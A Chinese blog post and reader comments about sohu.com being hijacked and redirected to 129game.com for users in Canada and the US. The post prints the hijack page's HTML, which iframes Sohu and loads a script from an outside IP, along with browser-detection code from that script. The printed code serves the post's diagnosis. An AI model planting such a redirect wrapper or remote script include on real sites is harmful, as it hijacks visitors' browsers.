搜狐网被 129game.com 劫持转向?加拿大无法打开搜狐网!
sohu.com 被转向!本人在加拿大卖电脑,店里有客人说我卖的电脑上不去搜狐网首页,说是搜狐网被封了,无法打开搜狐主页,试了一下,用IE访问搜狐网(sohu.com),发现被劫持到另外一个网址,网址如下:
http://ygame.gy9y.com/9v/149.html?subtype=167258
http://www.129game.com/iclk/?zoneid=271&uid=1497
http://ygame.gy9y.com/youyou/147.html?subtype=1497
如果用 IE 打开,那么电脑将会陷入死循环,一直打开该网页,如果用 Firefox 火狐浏览器打开,那么就显示有弹出窗口,弹出窗口也是以上页面,一开始怀疑是恶意插件,或者病毒什么的,用各种杀毒查毒工具查杀,无效。怀疑是 SOHU.COM 的网站的DNS被人劫持。或者我的ISP的DNS被人劫持了,用了各种系统测试 WIN7, XP 都无法打开 sohu.com ,且都被转向到 129game.com 这个垃圾广告网站中。看了下加拿大其他论坛,也出现这种问题,有人说搜狐网是被国家防火墙封了,真是开玩笑,被封难道会自动转向到129game.com这个网站么?如果搜狐网真的被加拿大国家封锁的话,那么访问搜狐网只会出现 Forbidden 的那个错误,或者是无法打开网页的错误,绝对不可能转向的!
各种情况检测报告:
ping sohu.com IP地址初始显示为 61.135.181.176,但是无法ping通
有时候还显示加载 hm.baidu.com
有时候 Ping IP 地址为 117.76.1.137(此IP为劫持后的IP)
IE浏览器被劫持
Firefox火狐浏览器被劫持
自己测试Chrome浏览器测试正常(不到半小时,Chrome也被劫持了)
有网友报到说 360浏览器测试正常(不过从下边代码来看,360也未能幸免)
打开源代码发现代码如下:
1 2 3 4 5 6 | <html><body style='margin:0;padding:0;height:100%' scroll=no><div id='Z'></div> <iframe id='CC' name='CC' src='http://www.sohu.com/' marginwidth='0' marginheight='0' frameborder='0' width='100%' height='50000'></iframe> <script language='javascript'>var CO=document.getElementById('CC');var M='http://www.sohu.com/';try{CO.contentWindow.document.location.href=M}catch(e){};setTimeout("G()",1500);function G(){try{var t=CO.contentWindow.document.title;if(t==undefined||t==''){setTimeout("G()",1500);return}document.title=t}catch(e){}}function H(m){document.getElementById(m).height=document.documentElement.offsetHeight-5}window.setInterval("H('CC')",100);function T(){location.href=M}</script><script src="http://117.76.1.137:2012/cdn3.js"> </script> </body> </html> |
最后的 http://117.76.1.137:2012/cdn3.js 就是劫持的浏览器的代码~~~
经分析:
1 2 3 4 5 6 | ie:/MSIE/.test(d), ie6:!/MSIE 7\.0/.test(d)&&/MSIE 6\.0/.test(d)&&!/MSIE 8\.0/.test(d), tt:/TencentTraveler/.test(d), i360:/360SE/.test(d), sogo:/; SE/.test(d), gg:window.google&&window.chrome, |
发现 IE6浏览器,IE7浏览器,IE8浏览器,腾讯浏览器,360浏览器,搜狗浏览器,Google浏览器Chrome 访问搜狐网的话都会转向到 129game.com。
解决办法:
如果想正常访问搜狐网,那么请用其他浏览器即可,但是现在市面上很多浏览器都是用的 IE 内核,所以也相当于 IE 浏览器,必须是有独立内核的浏览器才可以。另外,通过 Google 翻译搜狐网首页的话,也可以正常浏览搜狐网,因为是通过 Google 做转向的,所以没有问题,最后,如果大家只想访问搜狐证券,股市或搜狐论坛等分子页面,子网页或子域名的话,可以用百度或者 Google 搜索 “搜狐 证券” 或 “搜狐 股票” 等关键词,来直接访问子页面即可。对于主页,目前是没有办法了。
各种无奈,本人加拿大蒙特利尔,用的 Videotron ISP 服务,在网上搜索“搜狐网 129game.com 劫持” 等关键字、关键词,发现只有寥寥几条信息,而且都是近2日发的。看来搜狐网被劫持也是近两日出现的情况,求各种网友测试下!报告地理位置以及系统,浏览器。
搜狐网也会被劫持?搞网站安检的干什么吃的!
貌似是国外DNS被劫持了,不关搜狐的事吧。
看来你博客是很多国外的人访问啊!
没错,多伦多也是。chrome偶尔可以上去。
@wsseda 貌似整个北美的DNS都被转向了。那个黑客好牛逼啊
不关我啥事。反正
NY USA
Chorme, Ie
SAME PROBLEM
@dddppp 原来米国也是这样。我以为只有加拿大是这样呢
Calgary. Windows XP, Chrome, 360. Mobile: HTC Inspire 4G, Omni
@david 悲剧,直接搜索分页面吧
我家电脑也是,各种方法试了无效。地址美国syracuse,XP, chrome浏览器
@chen 鉴定不是自己的电脑问题,是外部环境被黑了。
@FORECE 应该不是自己的问题,各种尝试都做了,hosts也没问题,不知道哪里出问题了.....
@FORECE 室友的电脑也是同样的问题....看来是外部环境被黑了....
正常 用的VPN APNIC显示IP 216.18.195.121(Los Angeles) chrome16.0
Acnac ISP
Mississauga, Vista, ie8
same problem, since December 29.
@Paul 还没修好,我给搜狐发信也不管用,他们不管。
我在toronto, 在一台电脑上症状完全一样。其余3台完全正常
@Kevin 还有正常的??我这所有电脑全部沦陷
@FORECE no
toronto,window 7,ie9
same problem,sometimes ok for a while
@tim 和我一样的问题,时好时坏。